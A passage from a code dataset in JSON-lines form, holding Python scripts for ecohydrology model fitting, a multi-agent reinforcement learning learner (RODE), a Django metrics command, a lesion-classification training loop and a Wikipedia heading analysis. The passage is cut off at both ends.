np.nanmin(data_i['soil_water_pot'])\n psi_5 = np.percentile(data_i['soil_water_pot'], 5)\n l_hh = len(data_i.index)\n l_dd = len(data_i.resample('D').mean()['S'].dropna().index)\n n_y = len(list(set(data_i.index.year)))\n \n site_p = [site_i, pft, psi_min, psi_5, l_hh, l_dd, n_y]\n keys = ['site_id', 'pft', 'psi_min', 
'psi_5', 'l_hh', 'l_dd', 'n_y']\n for m, param_list_m in params_by_models:\n site_p.append(df[m]['a_p_med'])\n site_p.append(np.abs(df[m]['a_fu1_med'])\n + np.abs(df[m]['a_fu2_med'])\n + np.abs(df[m]['a_fr_med'])\n + np.abs(df[m]['a_fs_med']))\n keys.append('Ap_%s' % m)\n keys.append('Af_%s' % m)\n for p in param_list_m:\n site_p.append(np.nanmedian(df[m][p]))\n keys.append('%s_%s' % (p, m))\n site_p.append(np.nanstd(df[m][p]))\n keys.append('%s_%s_std' % (p, m))\n all_params.append(site_p)\n \n all_params = zip(*all_params)\n df = {}\n for k, pi in zip(keys, all_params):\n df[k] = pi\n \n all_params = pd.DataFrame(df)\n all_params.to_csv(out_file_m)\n\n\ndef gen_loso_params(f_name):\n param_results = []\n out_file_m = os.path.join(res_dir_2, f_name)\n\n for mod, param_list_m in params_by_models:\n for p in param_list_m:\n for site in sites:\n pft = sites_params[(sites_params['site_id'] == site)]['pft'].values[0]\n print(site, mod, p, pft)\n pickle_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('pickle') and (site in fi)][0]\n with open(pickle_file, 'rb') as pf:\n df = load(pf)\n x_site = np.array(df[mod][p])\n \n sites_re = sites_params[(sites_params['pft'] == pft) \n & (sites_params['site_id'] != site)]['site_id'].values\n x = np.array([])\n for site_i in sites_re:\n pickle_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('pickle') and (site_i in fi)][0]\n with open(pickle_file, 'rb') as pf:\n df = load(pf)\n xx = np.array(df[mod][p])\n x = np.concatenate((x, xx), axis=None)\n \n param_results.append([site, mod, p, pft,\n np.nanmean(x), np.nanmedian(x), np.nanstd(x),\n np.nanmax(x), np.nanmin(x),\n np.percentile(x, 75), np.percentile(x, 25),\n np.nanmedian(x_site)])\n \n site, mod, p, pft, p_mean, p_median, p_std, p_max, p_min, p_p75, p_p25, s_median = zip(*param_results)\n\n gen_pft_params = pd.DataFrame({'site_id': site, 'model': mod, 'parameter': p, 'pft': pft,\n 'mean': p_mean, 'median': p_median, 'std': p_std,\n 'max': p_max, 'min': p_min, \n 'p75': p_p75, 'p25': p_p25, \n 'site_median': s_median})\n\n gen_pft_params.to_csv(out_file_m)\n\n\ndef overall_pft_params(f_name):\n param_results = []\n out_file_m = os.path.join(res_dir_2, f_name) \n for mod, param_list_m in params_by_models:\n for p in param_list_m:\n for pft in pft_list:\n print(mod, p, pft)\n \n x = np.array([])\n sites_pft = sites_params[(sites_params['pft']==pft)]['site_id'].values\n for site_i in sites_pft:\n pickle_file = [os.path.join(res_dir, fi) for fi in os.listdir(res_dir) \n if fi.endswith('pickle') and (site_i in fi)][0]\n with open(pickle_file, 'rb') as pf:\n df = load(pf)\n\n xx = np.array(df[mod][p])\n x = np.concatenate((x, xx), axis=None)\n\n param_results.append([mod, p, pft, np.nanmean(x), np.nanmedian(x), np.nanstd(x),\n np.nanmax(x), np.nanmin(x), np.percentile(x, 75), np.percentile(x, 25)])\n \n \n mod, p, pft, p_mean, p_median, p_std, p_max, p_min, p_p75, p_25 = zip(*param_results)\n\n pft_params = pd.DataFrame({'model': mod, 'parameter': p,\n 'pft': pft, 'mean': p_mean, 'median': p_median,\n 'std': p_std, 'max': p_max, 'min': p_min, \n 'p75': p_p75, 'p25': p_25})\n \n pft_params.to_csv(out_file_m)\n\n\ndef cal_gen_model(f_name_i):\n sites_files = [os.path.join(res_dir, f) \n for f in os.listdir(res_dir) \n if f.endswith('bs.csv')]\n \n gen_params_0 = pd.read_csv(os.path.join(res_dir_2, 'gen_params_table_%s.csv' % sel))\n \n for site_i in sites:\n pft_i = sites_params[sites_params['site_id'] == site_i]['pft'].values[0]\n \n 
gen_params = gen_params_0[gen_params_0['site_id']==site_i]\n pickle_file = [os.path.join(res_dir, fi) \n for fi in os.listdir(res_dir) \n if fi.endswith('pickle') and (site_i in fi)][0]\n data_file = [os.path.join(res_dir, fi) \n for fi in os.listdir(res_dir) \n if fi.endswith('bs.csv') and (site_i in fi)][0]\n \n data_i = pd.read_csv(data_file, header = 0, index_col = 0, parse_dates = True, \n infer_datetime_format = True)\n with open(pickle_file, 'rb') as f:\n splitfit_results = load(f) \n \n xx = [data_i['VPD_l'].values, data_i['CO2'].values, data_i['GPP'].values, \n data_i['k1'].values, data_i['k2'].values, data_i['gamma_star'].values, \n data_i['S'].values, data_i['canopy_water_pot_pd'].values, data_i['leaf_water_pot'].values,\n data_i['Ga_mol'].values, data_i['Rn-G'].values,\n data_i['TA_F_MDS'].values, data_i['VPD_a'].values, \n data_i['P_air'].values, data_i['rho_air_d']]\n\n xx_l = [data_i['VPD_l'].values, data_i['CO2'].values, data_i['GPP'].values, \n data_i['k1'].values, data_i['k2'].values, data_i['gamma_star'].values, \n data_i['S'].values, data_i['canopy_water_pot_pd'].values, data_i['leaf_water_pot'].values,\n data_i['Ga_mol'].values, data_i['Rn-G'].values,\n data_i['TA_F_MDS'].values, data_i['VPD_a'].values, \n data_i['P_air'].values, data_i['rho_air_d'], data_i['LAI']]\n\n for tag in mod_list:\n if tag.startswith('WUE'):\n pp_m = ['lww', 'b']\n\n elif tag.startswith('CM'):\n pp_m = ['b2', 'b1', 'a', 'psi_50']\n \n elif tag.startswith('SOX'):\n pp_m = ['kmax', 'a', 'psi_50']\n\n g_params = Parameters()\n g_params.add('tag%s' % tag, value=0, vary=False)\n g_params.add('gsoil_max', value= data_i['gsoil_max_0_d'].values[0], vary=False)\n\n m_params = Parameters()\n m_params.add('tag%s' % tag, value=0, vary=False)\n m_params.add('gsoil_max', value= data_i['gsoil_max_0_d'].values[0], vary=False)\n\n for pi in ['lww', 'b', 'b2', 'b1', 'a', 'psi_50', 'kmax']:\n if pi in pp_m:\n if (pi in ['a', 'psi_50']) and (tag in ['SOXa_d1', 'SOX_d1', 'SOXait_d1', \n 'SOXit_d1', 'SOXa_i1', 'SOX_i1', \n 'CM_d2', 'CM_i2']):\n pi_g = data_i['%s_ref' % pi].values[0]\n pi_m = data_i['%s_ref' % pi].values[0]\n else:\n print(tag, pi, pft_i)\n pi_g = gen_params[(gen_params['model'] == tag) \n & (gen_params['parameter'] == pi)]['median'].values[0]\n pi_m = np.median(splitfit_results[tag][pi])\n m_params.add(pi, value=pi_m, vary=False)\n g_params.add(pi, value=pi_g, vary=False)\n else:\n g_params.add(pi, value=np.nan, vary=False)\n m_params.add(pi, value=np.nan, vary=False)\n\n g_surf_mod, g_soil_mod, g_canopy_mod, mwue =cal_g_surf(g_params, xx)\n LE, nse_LE, mape_LE = cal_models_LE(data_i, g_surf_mod)\n data_i['LE_%s_gen' % tag] = LE\n g_surf_mod_, g_soil_mod_, g_canopy_mod_, mwue_ = cal_g_surf(g_params, xx_l, leaf=1)\n LE, nse_LE, mape_LE = cal_models_LE(data_i, g_surf_mod_)\n data_i['LE_LAI_%s_gen' % tag] = LE\n ci = opt_ci(mwue_, data_i['VPD_l'].values, data_i['CO2'].values,\n data_i['k1'].values, data_i['k2'].values, data_i['gamma_star'].values)\n data_i['GPP_LAI_%s_gen' % tag] = 1 / 1.6 * g_canopy_mod_ * (data_i['CO2'].values - ci)\n\n g_surf_mod_, g_soil_mod_, g_canopy_mod_, mwue_ = cal_g_surf(m_params, xx_l, leaf=1)\n LE, nse_LE, mape_LE = cal_models_LE(data_i, g_surf_mod_)\n data_i['LE_LAI_%s' % tag] = LE\n ci = opt_ci(mwue_, data_i['VPD_l'].values, data_i['CO2'].values,\n data_i['k1'].values, data_i['k2'].values, data_i['gamma_star'].values)\n data_i['GPP_LAI_%s' % tag] = 1 / 1.6 * g_canopy_mod_ * (data_i['CO2'].values - ci)\n\n out_file_m = os.path.join(res_dir, '%s_%s' % (site_i, f_name_i))\n 
\n data_i.to_csv(out_file_m)\n print(site_i, 'done')\n\n\nif __name__ == \"__main__\":\n \n by_site_params('param_results_allsites_%s.csv' % sel)\n gen_loso_params('gen_params_table_%s.csv' % sel)\n overall_pft_params('pft_params_table_%s.csv' % sel)\n cal_gen_model('fitted_models_LE_gen.csv')\n","repo_name":"maoyab/DESOM","sub_path":"process_fit_gs_results.py","file_name":"process_fit_gs_results.py","file_ext":"py","file_size_in_byte":12225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6356872909","text":"import copy\nfrom components.episode_buffer import EpisodeBatch\nfrom modules.mixers.vdn import VDNMixer\nfrom modules.mixers.qmix import QMixer\nimport torch as th\nfrom torch.optim import RMSprop\n\nimport numpy as np\n\n\nclass RODELearner:\n def __init__(self, mac, scheme, logger, args):\n self.args = args\n self.mac = mac\n self.logger = logger\n self.n_agents = args.n_agents\n\n self.params = list(mac.parameters())\n\n self.last_target_update_episode = 0\n\n self.mixer = None\n if args.mixer is not None:\n if args.mixer == \"vdn\":\n self.mixer = VDNMixer()\n elif args.mixer == \"qmix\":\n self.mixer = QMixer(args)\n else:\n raise ValueError(\"Mixer {} not recognised.\".format(args.mixer))\n self.params += list(self.mixer.parameters())\n self.target_mixer = copy.deepcopy(self.mixer)\n\n self.role_mixer = None\n if args.role_mixer is not None:\n if args.role_mixer == \"vdn\":\n self.role_mixer = VDNMixer()\n elif args.role_mixer == \"qmix\":\n self.role_mixer = QMixer(args)\n else:\n raise ValueError(\"Role Mixer {} not recognised.\".format(args.role_mixer))\n self.params += list(self.role_mixer.parameters())\n self.target_role_mixer = copy.deepcopy(self.role_mixer)\n\n self.optimiser = RMSprop(params=self.params, lr=args.lr, alpha=args.optim_alpha, eps=args.optim_eps)\n\n # a little wasteful to deepcopy (e.g. 
duplicates action selector), but should work for any MAC\n self.target_mac = copy.deepcopy(mac)\n\n self.log_stats_t = -self.args.learner_log_interval - 1\n\n self.role_interval = args.role_interval\n self.device = self.args.device\n\n self.role_action_spaces_updated = True\n\n # action encoder\n self.action_encoder_params = list(self.mac.action_encoder_params())\n self.action_encoder_optimiser = RMSprop(params=self.action_encoder_params, lr=args.lr,\n alpha=args.optim_alpha, eps=args.optim_eps)\n\n def train(self, batch: EpisodeBatch, t_env: int, episode_num: int):\n # Get the relevant quantities\n rewards = batch[\"reward\"][:, :-1]\n actions = batch[\"actions\"][:, :-1]\n terminated = batch[\"terminated\"][:, :-1].float()\n mask = batch[\"filled\"][:, :-1].float()\n mask[:, 1:] = mask[:, 1:] * (1 - terminated[:, :-1])\n avail_actions = batch[\"avail_actions\"]\n # role_avail_actions = batch[\"role_avail_actions\"]\n roles_shape_o = batch[\"roles\"][:, :-1].shape\n role_at = int(np.ceil(roles_shape_o[1] / self.role_interval))\n role_t = role_at * self.role_interval\n\n roles_shape = list(roles_shape_o)\n roles_shape[1] = role_t\n roles = th.zeros(roles_shape).to(self.device)\n roles[:, :roles_shape_o[1]] = batch[\"roles\"][:, :-1]\n roles = roles.view(batch.batch_size, role_at, self.role_interval, self.n_agents, -1)[:, :, 0]\n\n # Calculate estimated Q-Values\n mac_out = []\n role_out = []\n self.mac.init_hidden(batch.batch_size)\n for t in range(batch.max_seq_length):\n agent_outs, role_outs = self.mac.forward(batch, t=t)\n mac_out.append(agent_outs)\n if t % self.role_interval == 0 and t < batch.max_seq_length - 1:\n role_out.append(role_outs)\n mac_out = th.stack(mac_out, dim=1) # Concat over time\n role_out = th.stack(role_out, dim=1) # Concat over time\n\n # Pick the Q-Values for the actions taken by each agent\n chosen_action_qvals = th.gather(mac_out[:, :-1], dim=3, index=actions).squeeze(3) # Remove the last dim\n chosen_role_qvals = th.gather(role_out, dim=3, index=roles.long()).squeeze(3)\n\n # Calculate the Q-Values necessary for the target\n target_mac_out = []\n target_role_out = []\n self.target_mac.init_hidden(batch.batch_size)\n for t in range(batch.max_seq_length):\n target_agent_outs, target_role_outs = self.target_mac.forward(batch, t=t)\n target_mac_out.append(target_agent_outs)\n if t % self.role_interval == 0 and t < batch.max_seq_length - 1:\n target_role_out.append(target_role_outs)\n\n target_role_out.append(th.zeros(batch.batch_size, self.n_agents, self.mac.n_roles).to(self.device))\n # We don't need the first timesteps Q-Value estimate for calculating targets\n target_mac_out = th.stack(target_mac_out[1:], dim=1) # Concat across time\n target_role_out = th.stack(target_role_out[1:], dim=1)\n\n # Mask out unavailable actions\n target_mac_out[avail_actions[:, 1:] == 0] = -9999999\n # target_mac_out[role_avail_actions[:, 1:] == 0] = -9999999\n\n # Max over target Q-Values\n if self.args.double_q:\n # Get actions that maximise live Q (for double q-learning)\n mac_out_detach = mac_out.clone().detach()\n mac_out_detach[avail_actions == 0] = -9999999\n # mac_out_detach[role_avail_actions == 0] = -9999999\n cur_max_actions = mac_out_detach[:, 1:].max(dim=3, keepdim=True)[1]\n target_max_qvals = th.gather(target_mac_out, 3, cur_max_actions).squeeze(3)\n\n role_out_detach = role_out.clone().detach()\n role_out_detach = th.cat([role_out_detach[:, 1:], role_out_detach[:, 0:1]], dim=1)\n cur_max_roles = role_out_detach.max(dim=3, keepdim=True)[1]\n target_role_max_qvals = 
th.gather(target_role_out, 3, cur_max_roles).squeeze(3)\n else:\n target_max_qvals = target_mac_out.max(dim=3)[0]\n target_role_max_qvals = target_role_out.max(dim=3)[0]\n\n # Mix\n if self.mixer is not None:\n chosen_action_qvals = self.mixer(chosen_action_qvals, batch[\"state\"][:, :-1])\n target_max_qvals = self.target_mixer(target_max_qvals, batch[\"state\"][:, 1:])\n if self.role_mixer is not None:\n state_shape_o = batch[\"state\"][:, :-1].shape\n state_shape = list(state_shape_o)\n state_shape[1] = role_t\n role_states = th.zeros(state_shape).to(self.device)\n role_states[:, :state_shape_o[1]] = batch[\"state\"][:, :-1].detach().clone()\n role_states = role_states.view(batch.batch_size, role_at,\n self.role_interval, -1)[:, :, 0]\n chosen_role_qvals = self.role_mixer(chosen_role_qvals, role_states)\n role_states = th.cat([role_states[:, 1:], role_states[:, 0:1]], dim=1)\n target_role_max_qvals = self.target_role_mixer(target_role_max_qvals, role_states)\n\n # Calculate 1-step Q-Learning targets\n targets = rewards + self.args.gamma * (1 - terminated) * target_max_qvals\n rewards_shape = list(rewards.shape)\n rewards_shape[1] = role_t\n role_rewards = th.zeros(rewards_shape).to(self.device)\n role_rewards[:, :rewards.shape[1]] = rewards.detach().clone()\n role_rewards = role_rewards.view(batch.batch_size, role_at,\n self.role_interval).sum(dim=-1, keepdim=True)\n # role_terminated\n terminated_shape_o = terminated.shape\n terminated_shape = list(terminated_shape_o)\n terminated_shape[1] = role_t\n role_terminated = th.zeros(terminated_shape).to(self.device)\n role_terminated[:, :terminated_shape_o[1]] = terminated.detach().clone()\n role_terminated = role_terminated.view(batch.batch_size, role_at, self.role_interval).sum(dim=-1, keepdim=True)\n # role_terminated\n role_targets = role_rewards + self.args.gamma * (1 - role_terminated) * target_role_max_qvals\n\n # Td-error\n td_error = (chosen_action_qvals - targets.detach())\n role_td_error = (chosen_role_qvals - role_targets.detach())\n\n mask = mask.expand_as(td_error)\n mask_shape = list(mask.shape)\n mask_shape[1] = role_t\n role_mask = th.zeros(mask_shape).to(self.device)\n role_mask[:, :mask.shape[1]] = mask.detach().clone()\n role_mask = role_mask.view(batch.batch_size, role_at, self.role_interval, -1)[:, :, 0]\n\n # 0-out the targets that came from padded data\n masked_td_error = td_error * mask\n masked_role_td_error = role_td_error * role_mask\n\n # Normal L2 loss, take mean over actual data\n loss = (masked_td_error ** 2).sum() / mask.sum()\n role_loss = (masked_role_td_error ** 2).sum() / role_mask.sum()\n loss += role_loss\n\n # Optimise\n self.optimiser.zero_grad()\n loss.backward()\n grad_norm = th.nn.utils.clip_grad_norm_(self.params, self.args.grad_norm_clip)\n self.optimiser.step()\n\n pred_obs_loss = None\n pred_r_loss = None\n pred_grad_norm = None\n if self.role_action_spaces_updated:\n # train action encoder\n no_pred = []\n r_pred = []\n for t in range(batch.max_seq_length):\n no_preds, r_preds = self.mac.action_repr_forward(batch, t=t)\n no_pred.append(no_preds)\n r_pred.append(r_preds)\n no_pred = th.stack(no_pred, dim=1)[:, :-1] # Concat over time\n r_pred = th.stack(r_pred, dim=1)[:, :-1]\n no = batch[\"obs\"][:, 1:].detach().clone()\n repeated_rewards = batch[\"reward\"][:, :-1].detach().clone().unsqueeze(2).repeat(1, 1, self.n_agents, 1)\n\n pred_obs_loss = th.sqrt(((no_pred - no) ** 2).sum(dim=-1)).mean()\n pred_r_loss = ((r_pred - repeated_rewards) ** 2).mean()\n\n pred_loss = pred_obs_loss + 10 * 
pred_r_loss\n self.action_encoder_optimiser.zero_grad()\n pred_loss.backward()\n pred_grad_norm = th.nn.utils.clip_grad_norm_(self.action_encoder_params, self.args.grad_norm_clip)\n self.action_encoder_optimiser.step()\n\n if t_env > self.args.role_action_spaces_update_start:\n self.mac.update_role_action_spaces()\n if 'noar' in self.args.mac:\n self.target_mac.role_selector.update_roles(self.mac.n_roles)\n self.role_action_spaces_updated = False\n self._update_targets()\n self.last_target_update_episode = episode_num\n\n if (episode_num - self.last_target_update_episode) / self.args.target_update_interval >= 1.0:\n self._update_targets()\n self.last_target_update_episode = episode_num\n\n if t_env - self.log_stats_t >= self.args.learner_log_interval:\n self.logger.log_stat(\"loss\", (loss - role_loss).item(), t_env)\n self.logger.log_stat(\"role_loss\", role_loss.item(), t_env)\n self.logger.log_stat(\"grad_norm\", grad_norm, t_env)\n if pred_obs_loss is not None:\n self.logger.log_stat(\"pred_obs_loss\", pred_obs_loss.item(), t_env)\n self.logger.log_stat(\"pred_r_loss\", pred_r_loss.item(), t_env)\n self.logger.log_stat(\"action_encoder_grad_norm\", pred_grad_norm, t_env)\n mask_elems = mask.sum().item()\n self.logger.log_stat(\"td_error_abs\", (masked_td_error.abs().sum().item() / mask_elems), t_env)\n self.logger.log_stat(\"q_taken_mean\",\n (chosen_action_qvals * mask).sum().item() / (mask_elems * self.args.n_agents), t_env)\n self.logger.log_stat(\"role_q_taken_mean\",\n (chosen_role_qvals * role_mask).sum().item() / (role_mask.sum().item() * self.args.n_agents), t_env)\n self.logger.log_stat(\"target_mean\", (targets * mask).sum().item() / (mask_elems * self.args.n_agents),\n t_env)\n self.log_stats_t = t_env\n\n def _update_targets(self):\n self.target_mac.load_state(self.mac)\n if self.mixer is not None:\n self.target_mixer.load_state_dict(self.mixer.state_dict())\n if self.role_mixer is not None:\n self.target_role_mixer.load_state_dict(self.role_mixer.state_dict())\n self.target_mac.role_action_spaces_updated = self.role_action_spaces_updated\n self.logger.console_logger.info(\"Updated target network\")\n\n def cuda(self):\n self.mac.cuda()\n self.target_mac.cuda()\n if self.mixer is not None:\n self.mixer.cuda()\n self.target_mixer.cuda()\n if self.role_mixer is not None:\n self.role_mixer.cuda()\n self.target_role_mixer.cuda()\n\n def save_models(self, path):\n self.mac.save_models(path)\n if self.mixer is not None:\n th.save(self.mixer.state_dict(), \"{}/mixer.th\".format(path))\n if self.role_mixer is not None:\n th.save(self.role_mixer.state_dict(), \"{}/role_mixer.th\".format(path))\n th.save(self.optimiser.state_dict(), \"{}/opt.th\".format(path))\n th.save(self.action_encoder_optimiser.state_dict(), \"{}/action_repr_opt.th\".format(path))\n\n def load_models(self, path):\n self.mac.load_models(path)\n # Not quite right but I don't want to save target networks\n self.target_mac.load_models(path)\n if self.mixer is not None:\n self.mixer.load_state_dict(th.load(\"{}/mixer.th\".format(path), map_location=lambda storage, loc: storage))\n if self.role_mixer is not None:\n self.role_mixer.load_state_dict(\n th.load(\"{}/role_mixer.th\".format(path), map_location=lambda storage, loc: storage))\n self.optimiser.load_state_dict(th.load(\"{}/opt.th\".format(path), map_location=lambda storage, loc: storage))\n self.action_encoder_optimiser.load_state_dict(th.load(\"{}/action_repr_opt.th\".format(path),\n map_location=lambda storage, loc: 
storage))\n","repo_name":"TonghanWang/RODE","sub_path":"src/learners/rode_learner.py","file_name":"rode_learner.py","file_ext":"py","file_size_in_byte":13967,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"81"} +{"seq_id":"41187773173","text":"from django.core.management import BaseCommand\n\nfrom ...models import Metric\nfrom ...utils import reset_generation_key\n\n\nclass Command(BaseCommand):\n def handle(self, **options):\n verbose = int(options.get(\"verbosity\", 0))\n for MC in Metric.__subclasses__():\n for metric in MC.objects.all():\n if verbose:\n self.stdout.write(\n \"Updating %s ... \" % metric.name.lower(), ending=\"\"\n )\n datum = metric.data.create(measurement=metric.fetch())\n if verbose:\n print(datum.measurement)\n reset_generation_key()\n","repo_name":"django/djangoproject.com","sub_path":"dashboard/management/commands/update_metrics.py","file_name":"update_metrics.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1791,"dataset":"github-code","pt":"81"} +{"seq_id":"37959200210","text":"## To train single modality model\n## Setting the different paths to distinguish the lesion MRI and the lesion MRI contained by larger cube. \nimport torch\nimport time\nimport os\nimport sys\n\nimport torch\nimport argparse\nfrom utils.dataset_1m import dataset\n#from utils.dataset_full import dataset_no_ml\nfrom utils.util import write_num_ls, calc_metrics\nfrom net.clf_1m import be_ma_net\n\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import auc\n\n\nimport random\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nimport torch.nn as nn\nimport numpy as np\nimport ml_collections\nfrom termcolor import colored \n\nparser = argparse.ArgumentParser()\nparser.add_argument('-root', type=str, default='')\nparser.add_argument('-train_path', type=str, default='')\nparser.add_argument('-vali_path', type=str, default='')\nparser.add_argument('-mt', type=str, default='')\nparser.add_argument('-model_save', type=str, )\nparser.add_argument('-seq', type=int, default=1)\nparser.add_argument('-cube', type=str, default=False)\n\nargs = parser.parse_args()\n\n\ndef train_net_config():\n\n config = ml_collections.ConfigDict()\n \n # config.mri_type=args.mt\n # config.seq=args.seq\n \n config.mri_type=args.mt\n config.seq=args.seq\n config.root=args.root\n \n if args.cube=='yes':\n config.cube=True\n else:\n config.cube=False\n\n config.train_path=args.train_path\n config.vali_path=args.vali_path\n\n config_model_save=args.model_save\n\n\n if args.cube:\n config.log_prefix=config.mri_type+'_cube_exp'+str(config.seq)\n else:\n config.log_prefix=config.mri_type+'_no_cube_exp'+str(config.seq)\n\n config.model_save=config_model_save+config.log_prefix+'/'\n \n config.log_path=config.model_save\n config.bs=16\n config.lr=0.01\n config.gpu='0'\n config.seed=1234\n config.min_epoch=1\n config.max_epoch=200\n config.log_name='log_from_epoch_{}_to_{}.txt'.format(config.min_epoch,config.max_epoch)\n config.deterministic=True\n\n return config\n\nconfig=train_net_config()\n#config=train_no_cube_config()\nos.makedirs(config.model_save,exist_ok=True)\n\nos.environ['CUDA_VISIBLE_DEVICES'] = config.gpu\n\nres_log = config.log_prefix+'_res_log.txt' ## loss logs\nloss_log = config.log_prefix+'_loss_ilog.txt'\nloss_log_e =config.log_prefix+'_loss_elog.txt'\n\n\nres_fd= 
open(config.log_path+res_log, 'w')\nloss_fd_i = open(config.log_path+loss_log, 'w')\nloss_fd_e = open(config.log_path+loss_log_e, 'w')\n\n\n\nuse_model = False\nuse_ml = False\n\n\nif config.deterministic:\n cudnn.benchmark = False\n cudnn.deterministic = True\n random.seed(config.seed)\n np.random.seed(config.seed)\n torch.manual_seed(config.seed)\n torch.cuda.manual_seed(config.seed)\n\ndef worker_init_fn(worker_id):\n random.seed(config.seed + worker_id)\n\n\ndef accuary(outputs, label):\n _, predicted = torch.max(outputs.data, 1)\n \n sum = 0\n for i in range(predicted.shape[0]):\n if predicted[i] == label[i]:\n sum += 1\n return float(sum / len(predicted))\n\n\ndef acc_count(outputs, label):\n _, predicted = torch.max(outputs.data, 1)\n sum = 0\n for i in range(predicted.shape[0]):\n if predicted[i] == label[i]:\n sum += 1\n return sum\n\n\ndef vali(net, valiloader, length):\n net.eval()\n predict = []\n label = []\n pred_proba = []\n vali_acc_sum = 0\n\n for idx, (volume_batch,label_batch,) in enumerate(valiloader):\n volume_batch, label_batch = volume_batch.cuda(), label_batch.cuda()\n outputs = net(volume_batch)\n # print(outputs)\n acc = acc_count(outputs, label_batch)\n vali_acc_sum += acc\n\n _, predict_batch = torch.max(outputs.data, 1)\n softmax_out = F.softmax(outputs, dim=1).cpu()\n proba = np.squeeze(softmax_out.data.numpy())\n label_v = label_batch[0].item()\n pred_v = predict_batch[0].item()\n\n predict.append(pred_v)\n label.append(label_v)\n pred_proba.append(proba)\n\n vali_acc = vali_acc_sum / length\n #acc_auc_fd.writelines('iteration: {}, vali acc: {}.\\n'.format(iter_num, vali_acc))\n return vali_acc, label, predict, pred_proba\n\nif __name__ == '__main__':\n\n\n net = be_ma_net(1).cuda()\n \n print(res_log)\n print(loss_log)\n print(loss_log_e)\n\n\n print('train_root is {}, train_path is {}'.format(config.root,config.train_path))\n print('vali_root is {}, vali_path is {}'.format(config.root,config.vali_path))\n print('batch_size is: {}, init_lr is: {}'.format(config.bs,config.lr))\n print(\"save_path is: \",config.model_save)\n print(\"log save_path is: \",config.log_path)\n print(\"################# Loading Data ###########################\\n\")\n\n\n train_data = dataset(config.root, config.train_path)\n trainloader = DataLoader(train_data, batch_size=config.bs, shuffle=True, num_workers=4, pin_memory=True,\n worker_init_fn=worker_init_fn) \n train_len = len(train_data)\n\n vali_data = dataset(config.root, config.vali_path)\n valiloader = DataLoader(vali_data, batch_size=1, shuffle=True, num_workers=4, pin_memory=True,\n worker_init_fn=worker_init_fn)\n\n vali_len = len(vali_data)\n optimizer = optim.SGD(net.parameters(), lr=config.lr, momentum=0.9, weight_decay=0.0001)\n\n iter_num = 0\n \n lr_ = config.lr\n criterion = nn.CrossEntropyLoss()\n criterion.cuda()\n\n # net.train()\n print(\"the number of train samples.\", len(trainloader))\n print(\"#################### Train Start ####################\")\n\n date = time.strftime(\"%Y_%m_%d_%H_%M\")\n save_path = config.model_save\n\n \n if not os.path.exists(save_path):\n os.makedirs(save_path, exist_ok=True)\n\n\n\n for iter_num in range(1,config.max_epoch):\n net.train()\n loss_sum = 0\n time1 = time.time()\n\n for idx, (volume_batch,label_batch,) in enumerate(trainloader):\n # print('fetch data cost {}'.format(time2-time1))\n # print(\"label value....\",label_batch)\n\n # print(\"volume_batch....\", volume_batch.shape)\n volume_batch, label_batch = volume_batch.cuda(), label_batch.cuda()\n\n outputs = 
net(volume_batch)\n # outputs = net(volume_batch)\n\n # print(outputs.shape)\n loss = criterion(outputs, label_batch)\n loss_iter_v=loss.item()\n #print(loss_iter_v)\n loss_fd_i.write(str(loss_iter_v) + ' ')\n ## acc=accuary(outputs,label_batch)\n loss_sum += loss_iter_v\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n time2 = time.time()\n loss_v = loss_sum / len(trainloader)\n print('iteration:{}, loss value:{}, time:{}.'.format(iter_num, loss_v, time2 - time1))\n res_fd.writelines('iteration:{}, loss value:{}, time:{}.\\n'.format(iter_num, loss_v, time2 - time1))\n loss_fd_e.writelines('iteration:{}, loss value:{}.\\n'.format(iter_num, loss_v))\n \n \n\n if iter_num %10==0:\n train_acc, _, _, _ = vali(net, trainloader, train_len)\n vali_acc, label, predict, pred_proba = vali(net, valiloader, vali_len)\n\n print('train acc: {} and vali_acc: {}'.format(train_acc,vali_acc))\n res_fd.writelines('train acc: {} and vali_acc: {}\\n'.format(train_acc,vali_acc))\n pred_proba = np.array(pred_proba)[:, -1].tolist()\n \n auc_v,acc,sensitivity,specificity,npv,ppv,=calc_metrics(label, predict, pred_proba, False)\n print(colored('auc_v {},acc {},sensitivity {},specificity {},npv {},ppv {}'.format(auc_v,acc,sensitivity,specificity,npv,ppv),'green'))\n res_fd.writelines(\"auc_v {},acc {},sensitivity {},specificity {},npv {},ppv {}\\n\".format(auc_v,acc,sensitivity,specificity,npv,ppv))\n model_name='iter_' + str(iter_num + 1)+'_'+str(auc_v)+'_'+str(acc)+'.pth'\n mode_path = os.path.join(save_path, model_name)\n torch.save(net.state_dict(), mode_path)\n","repo_name":"BCClfer/Classification-of-benign-and-malignant-lesions","sub_path":"train_single_mod.py","file_name":"train_single_mod.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18712944141","text":"from collections import defaultdict\nimport re\nimport jadelogs\nimport wikitextparser\nimport csv\n\n\nfrom tropes.datahandlers.wikipedia.wikipedia_datahandler import WikipediaDatahandler\n\nclass WikipediaAnalysis:\n def __init__(self):\n self._wikipedia_data_handler = WikipediaDatahandler()\n self._subtitles_counts = defaultdict(int)\n self._jade_logger = jadelogs.JadeLogger()\n\n def load(self):\n self._wikipedia_data_handler.load()\n\n def get_list_of_subheadings(self):\n subheadings = []\n location = 'narrativelab/tropes/analysis/wikipedia/list_of_picked_subheadings.txt'\n location = self._jade_logger.file_manager.code_filepath(location)\n with open(location) as f:\n for line in f:\n subheadings.append(line.strip())\n return subheadings\n\n def create_dataset(self):\n dataset = defaultdict(list)\n subheadings = self.get_list_of_subheadings()\n for subheading in subheadings:\n dataset[subheading] = []\n interested = False\n para = \"\"\n\n for datum in self._wikipedia_data_handler.data():\n heading_flag = datum.startswith('==') and not datum.startswith('===')\n if heading_flag is True:\n word = re.sub(r'=*', '', datum)\n word = word.strip()\n if word in subheadings:\n interested = True\n else:\n interested = False\n if para != \"\":\n if interested is True and len(dataset[key]) < 200:\n dataset[key].extend(self._clean_sentence(para))\n 